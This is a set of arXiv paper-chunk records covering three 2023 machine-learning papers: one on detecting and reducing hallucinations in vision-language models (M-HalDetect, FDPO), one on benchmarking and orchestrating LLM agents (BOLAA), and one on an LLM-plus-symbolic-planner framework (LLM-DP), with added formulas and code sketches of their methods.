a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
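The records for this paper repeatedly reference FDPO, a fine-grained variant of Direct Preference Optimization that, per the abstract, uses fine-grained annotations on individual examples instead of relative preferences over response pairs. For orientation, the standard pairwise DPO objective from Rafailov et al. (2023), which FDPO modifies, is:

```latex
\mathcal{L}_{\mathrm{DPO}}(\pi_\theta;\pi_{\mathrm{ref}})
  = -\,\mathbb{E}_{(x,\,y_w,\,y_l)\sim\mathcal{D}}
    \left[\log \sigma\!\left(
      \beta \log \frac{\pi_\theta(y_w \mid x)}{\pi_{\mathrm{ref}}(y_w \mid x)}
      - \beta \log \frac{\pi_\theta(y_l \mid x)}{\pi_{\mathrm{ref}}(y_l \mid x)}
    \right)\right]
```

Here \(\pi_\theta\) is the model being optimized, \(\pi_{\mathrm{ref}}\) a frozen reference model, and \((y_w, y_l)\) a preferred/dispreferred response pair for prompt \(x\).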
2308.05960 | 5 | Thirdly, the increasing complexity of tasks may require the orchestration of multiple agents. ReWOO recently identifies that decoupling reasoning from observation improves the efficiency for LAA. In this paper, we argue that as the task complexity increases, especially in open-domain environments, it is better to coordinate multiple agents to complete one task. For example, regarding the web navigation task, we could employ one click agent to interact with clickable buttons and request another search agent to retrieve additional resources. Nonetheless, there are few works discussing how to orchestrate multiple agents and investigating the impacts of orchestration.
To address these research gaps, this paper proposes to comprehensively compare the performances of LAAs. We dive deep into the agent architecture of LAAs and the LLM backbones. Specifically, we construct agent benchmarks from the existing environments to evaluate the performances of various agent architectures built upon various LLM backbones. The tasks in our agent benchmarks are associated with different task complexity levels, which enables the agent performance analyses w.r.t. task complexity. Those agent architectures are designed to extensively verify the existing design choices. Regarding the orchestration of multiple LAAs, we propose a novel LAA architecture BOLAA5, which has a controller module on top of multiple collaborated agents, for enabling the selection and communication between multiple labor LAA.
The contributions of this paper are as follows: | 2308.05960#5 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
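The record above describes BOLAA's controller-over-labor-agents design only in prose; the following is a minimal Python sketch of that orchestration idea. All names here (`LaborAgent`, `Controller`, `llm_call`) are hypothetical illustrations under stated assumptions, not the released BOLAA API.

```python
from dataclasses import dataclass
from typing import Callable

@dataclass
class LaborAgent:
    name: str            # e.g. "click" or "search"
    action_space: str    # description of the single action type it handles
    llm_call: Callable[[str], str]  # backbone LLM completion function

    def act(self, observation: str) -> str:
        # Each labor agent prompts the LLM only about its own action type.
        prompt = (f"You control the '{self.name}' actions: {self.action_space}\n"
                  f"Observation: {observation}\nNext action:")
        return self.llm_call(prompt)

class Controller:
    """Selects which labor agent should handle the current observation."""
    def __init__(self, agents: list[LaborAgent], llm_call: Callable[[str], str]):
        self.agents = {a.name: a for a in agents}
        self.llm_call = llm_call

    def step(self, observation: str) -> str:
        # The controller itself uses the LLM to route the step.
        choices = ", ".join(self.agents)
        name = self.llm_call(
            f"Observation: {observation}\nWhich agent should act next ({choices})?"
        ).strip().lower()
        agent = self.agents.get(name, next(iter(self.agents.values())))
        return agent.act(observation)
```

A web-navigation setup, for instance, could register a "click" agent and a "search" agent and let the controller dispatch each observation to one of them.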
2308.06391 | 5 | 2022; Chen et al., 2022; Min et al., 2022), traditional planners need maximal information.
In this work, we introduce the LLM Dynamic Planner (LLM-DP), a neuro-symbolic framework that integrates an LLM with a symbolic planner to solve embodied tasks. LLM-DP capitalises on the LLM's ability to understand actions and their impact on the environment and combines it with the planner's efficiency in finding solutions (a minimal sketch of this loop follows this record). Using domain knowledge, LLM-DP solves the Alfworld test set faster and more efficiently than an LLM-only (ReAct) approach. The remainder of this paper explores the architecture of LLM-DP, discusses how to combine the strengths of LLMs and symbolic planning, and presents potential research avenues for future work in LLM-driven agents.
# 2 Related Work | 2308.06391#5 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
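As a companion to the record above, here is a minimal sketch of the neuro-symbolic loop it describes: the LLM grounds a noisy observation into a symbolic problem, and a classical planner searches for the plan. The helper names (`llm`, `run_planner`, `solve_task`) are hypothetical placeholders, not the LLM-DP codebase.

```python
def llm(prompt: str) -> str:
    raise NotImplementedError  # call your LLM backend here

def run_planner(domain_pddl: str, problem_pddl: str) -> list[str]:
    raise NotImplementedError  # call e.g. a Fast-Forward-style planner here

def solve_task(task: str, observation: str, domain_pddl: str) -> list[str]:
    # 1. Neural step: the LLM grounds the task and observation into a
    #    symbolic problem file, coping with noise and partial information.
    problem_pddl = llm(
        "Translate this task and observation into a PDDL problem.\n"
        f"Task: {task}\nObservation: {observation}"
    )
    # 2. Symbolic step: the planner finds an action sequence efficiently.
    return run_planner(domain_pddl, problem_pddl)
```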
2308.06394 | 5 | To facilitate automatic hallucination detection, we first build a diverse human-labeled dataset using VQA responses from InstructBLIP, as seen in Figure 1. We then train multiple reward models of various densities (sentence-level, sub-sentence level) on this dataset for hallucination detection. An effective way to use these reward models to reduce hallucinations is to use them to generate rewards in a reinforcement learning setup (Ziegler et al. 2019; Stiennon et al. 2020; Nakano et al. 2021), although the resulting final model can only be as effective as the original reward model used (Bai et al. 2022). Therefore, in this paper we focus on measuring the quality of these reward models, exploring classification metrics and using best-of-n rejection sampling as an approximation of the system's performance (a best-of-n sketch follows this record). Similar to Rafailov et al. (2023), we also directly optimize InstructBLIP with Fine-grained Direct Preference Optimization (FDPO), a novel variation of DPO in which we leverage fine-grained annotation information from individual examples, rather than collecting relative preference signals from pairs of texts. Both | 2308.06394#5 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only considers object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
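The record above mentions best-of-n rejection sampling with a sentence-level reward model; a minimal sketch of that procedure follows, assuming hypothetical `generate` and `reward_model` helpers in place of the LVLM sampler and the trained reward model.

```python
def generate(image, question: str) -> str:
    raise NotImplementedError  # sample one response from the LVLM

def reward_model(image, sentence: str) -> float:
    raise NotImplementedError  # trained sentence-level reward model

def best_of_n(image, question: str, n: int = 8) -> str:
    # Sample n candidate responses, score each by its average sentence-level
    # reward, and keep the best; hallucinated sentences drag a score down.
    candidates = [generate(image, question) for _ in range(n)]
    def score(response: str) -> float:
        sentences = [s for s in response.split(". ") if s]
        return sum(reward_model(image, s) for s in sentences) / max(len(sentences), 1)
    return max(candidates, key=score)
```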
2308.05960 | 6 | The contributions of this paper are as follows:
• We develop 6 different LAA agent architectures. We combine them with various backbone LLMs to justify the design intuition of LAAs with respect to prompting, self-thinking, and planning. We also develop BOLAA for orchestrating a multi-agent strategy, which enhances the action interaction ability of solo agents.
• We conduct extensive experiments on both a decision-making web navigation environment and a knowledge reasoning task environment. We report performance in terms of final sparse rewards and intermediate recalls, which provides qualitative indications for the optimal choice of LAAs as well as their compatible LLMs.
• BOLAA on the WebShop environment consistently yields the best performance compared with other LAA architectures. Our results demonstrate the importance of designing specialist agents that collaborate on resolving complex tasks, which should be equally as important as training a large LLM with high generalization ability.
2 RELATED WORK
2.1 AUGMENTED LANGUAGE AGENT ARCHITECTURE | 2308.05960#6 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 6 | # 2 Related Work
Symbolic Planners Symbolic planners have been a cornerstone in automated planning and artificial intelligence for decades (Fikes and Nilsson, 1971). Based on formal logic, they operate over symbolic representations of the world to find a sequence of actions that transition from an initial state to a goal state. Since the introduction of PDDL (McDermott, 2000), the AI planning community has developed an array of efficient planning algorithms. For example, the Fast-Forward planner (FF) (Hoffmann and Nebel, 2001) employs heuristics derived from a relaxed version of the planning problem. Similarly, the BFS(f) planner (Lipovetzky et al., 2014) combines breadth-first search and specialised heuristics. These planners find high-quality or optimal solutions quickly in well-defined domains. However, their up-front requirement for comprehensive problem and domain descriptions limits their applicability in complex real-world settings where complete information may not be available (a toy PDDL example follows this record). | 2308.06391#6 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
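To make the "comprehensive problem and domain descriptions" requirement above concrete, here is a toy PDDL domain and problem embedded as Python strings; the kitchen example is a hypothetical illustration, not taken from the paper.

```python
# Classical planners such as FF or BFS(f) consume a domain file (action
# schemas) and a problem file (initial state and goal).
DOMAIN = """
(define (domain toy-kitchen)
  (:predicates (holding ?o) (at ?o ?loc) (robot-at ?loc))
  (:action pick-up
    :parameters (?o ?loc)
    :precondition (and (at ?o ?loc) (robot-at ?loc))
    :effect (and (holding ?o) (not (at ?o ?loc)))))
"""

PROBLEM = """
(define (problem fetch-mug)
  (:domain toy-kitchen)
  (:init (at mug table) (robot-at table))
  (:goal (holding mug)))
"""
# If any :init fact is missing or wrong, the search may fail entirely,
# which is exactly the limitation noted in the record above.
```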
2308.06394 | 6 | of DPO in which we leverage fine-grained annotation information from individual examples, rather than collecting relative preference signals from pairs of texts (an FDPO-style loss sketch follows this record). Both methods show significant success in reducing hallucination rates from InstructBLIP, and furthermore, rejection sampling with our reward models reduces hallucination rates in other multi-modal models as well: LLaVA (Liu et al. 2023b) and mPLUG-OWL (Ye et al. 2023). | 2308.06394#6 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only considers object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
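The records above describe FDPO only at a high level; below is a hedged PyTorch sketch of what a fine-grained, segment-level DPO-style objective could look like. The function name, tensor shapes, and the exact form of the objective are illustrative assumptions under the paper's description, not its verbatim implementation.

```python
import torch
import torch.nn.functional as F

def fdpo_loss(policy_logp_seg, ref_logp_seg, labels, beta=0.1):
    """Segment-level DPO-style loss.

    policy_logp_seg: (num_segments,) summed token log-probs under the policy
    ref_logp_seg:    (num_segments,) same segments under a frozen reference
    labels:          (num_segments,) +1 for Accurate, -1 for Inaccurate,
                     0 for Analysis segments (ignored)
    """
    # Implicit per-segment reward: the log-ratio against the reference model.
    ratio = beta * (policy_logp_seg - ref_logp_seg)
    mask = labels != 0
    # -log sigmoid(+ratio) pushes accurate segments up; -log sigmoid(-ratio)
    # pushes hallucinated (inaccurate) segments down.
    loss = -F.logsigmoid(labels[mask] * ratio[mask])
    return loss.mean()

# Example: two accurate segments, one hallucinated, one analysis segment.
loss = fdpo_loss(torch.tensor([-3.1, -2.0, -4.5, -1.2]),
                 torch.tensor([-3.0, -2.2, -4.0, -1.1]),
                 torch.tensor([1, 1, -1, 0]))
```

The key contrast with standard DPO is that the preference signal comes from labels on individual segments of one response rather than from a chosen/rejected pair of whole responses.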
2308.05960 | 7 | 2 RELATED WORK
2.1 AUGMENTED LANGUAGE AGENT ARCHITECTURE
The completion of a complex task typically entails multiple stages. An agent must possess an understanding of these stages and plan accordingly. Chain-of-Thought, also known as CoT (Wei et al., 2022), is a groundbreaking work that prompts the agent to deconstruct challenging reasoning tasks into smaller, more manageable steps. On the other hand, ReAct (Yao et al., 2023a) proposes leveraging this aptitude for reasoning and action within Large Language Models (LLMs) to foster interactive engagement with the environment, such as utilizing the Wikipedia search API, by mapping observations to the generation of reasoning and action traces or API calls in natural language (a minimal ReAct loop sketch follows this record).
5 For ease of memorization, we intentionally name it the same as the paper title.
This agent architecture has given rise to various applications, including HuggingGPT (Shen et al., 2023), Generative Agents (Park et al., 2023), WebGPT (Nakano et al., 2021), AutoGPT (Gravitas, 2023), BabyAGI (Nakajima, 2023), and Langchain (Chase, 2023).
| 2308.05960#7 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
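The record above describes ReAct's observation-to-reasoning/action mapping; below is a minimal sketch of that loop, with hypothetical `llm` and `env_step` placeholders standing in for the backbone LLM and the environment (e.g., a Wikipedia search API).

```python
def llm(prompt: str) -> str:
    raise NotImplementedError  # backbone LLM completion

def env_step(action: str) -> str:
    raise NotImplementedError  # e.g. a Wikipedia search API call

def react(task: str, max_steps: int = 8) -> str:
    # Alternate free-text reasoning ("Thought") with environment actions
    # ("Action"), feeding each observation back into the growing trace.
    trace = f"Task: {task}\n"
    for _ in range(max_steps):
        thought = llm(trace + "Thought:")
        action = llm(trace + f"Thought: {thought}\nAction:")
        if action.strip().startswith("Finish"):
            return action
        observation = env_step(action)
        trace += (f"Thought: {thought}\nAction: {action}\n"
                  f"Observation: {observation}\n")
    return trace
```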
2308.06391 | 7 | LLMs in Planning and Reasoning In contrast to symbolic planners, LLMs have shown promise in adapting to noisy planning and reasoning tasks through various methods. Some general approaches such as Chain-of-Thought (Wei et al., 2022), Self-Consistency (Wang et al., 2023b), and Reasoning via Planning (Hao et al., 2023) augment the context with a reasoning trace that the LLM generates to improve its final prediction (a self-consistency sketch follows this record). Alternatively, an LLM can be given access to tools/APIs (Schick et al., 2023; Patil et al., 2023), outside knowledge or databases (Peng et al., 2023; Hu et al., 2023), code (Surís et al., 2023), and even symbolic reasoners (Yang et al., 2023) to enrich its context and ability to reason. The LLM can trigger these external sources of information or logic (through fine-tuning or prompting) to obtain additional context and improve its downstream performance. | 2308.06391#7 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
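The record above cites Self-Consistency among general reasoning approaches; the following is a minimal sketch of it, assuming hypothetical `llm_sample` and `extract_answer` helpers: sample several reasoning traces at non-zero temperature and majority-vote the final answers.

```python
from collections import Counter

def llm_sample(prompt: str, temperature: float = 0.7) -> str:
    raise NotImplementedError  # one sampled reasoning trace from the LLM

def extract_answer(trace: str) -> str:
    # Naive final-answer parse; assumes traces end with "Answer: ...".
    return trace.rsplit("Answer:", 1)[-1].strip()

def self_consistency(question: str, n: int = 10) -> str:
    traces = [llm_sample(f"{question}\nLet's think step by step.")
              for _ in range(n)]
    answers = [extract_answer(t) for t in traces]
    return Counter(answers).most_common(1)[0][0]  # majority vote
```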
2308.06394 | 7 | Our main contributions are as follows:
1. We create and release M-HalDetect, our hallucination detection dataset focused on fine-grained annotations over complex image descriptions at a sub-sentence level (a sketch of the annotation format follows this record).
2. We show that InstructBLIP can be optimized using Fine-grained DPO (FDPO) over our M-HalDetect to reduce hallucination rates by 41%.
[Figure 1: Example annotation from the M-HalDetect dataset. The sub-sentences of text generated by the multi-modal LM are tagged into categories: Accurate, Inaccurate, and Analysis.] | 2308.06394#7 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
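As a companion to the contributions and Figure 1 caption above, here is a hypothetical illustration of what a sub-sentence-level M-HalDetect record could look like; the field names are assumptions for illustration, not the released schema.

```python
# One annotated VQA example: the response is split into sub-sentence segments,
# each tagged as Accurate, Inaccurate, or Analysis (subjective commentary).
example_record = {
    "image_id": "coco_000000123456",
    "question": "Provide an intricate description of the image...",
    "response": "The image depicts a busy city street filled with cars...",
    "segments": [
        {"text": "The image depicts a busy city street filled with cars",
         "label": "Accurate"},
        {"text": "No people are specifically mentioned in the image",
         "label": "Inaccurate"},  # contradicts the visible pedestrians
        {"text": "showcasing the diversity and vibrancy of urban life",
         "label": "Analysis"},    # subjective, not visually groundable
    ],
}
```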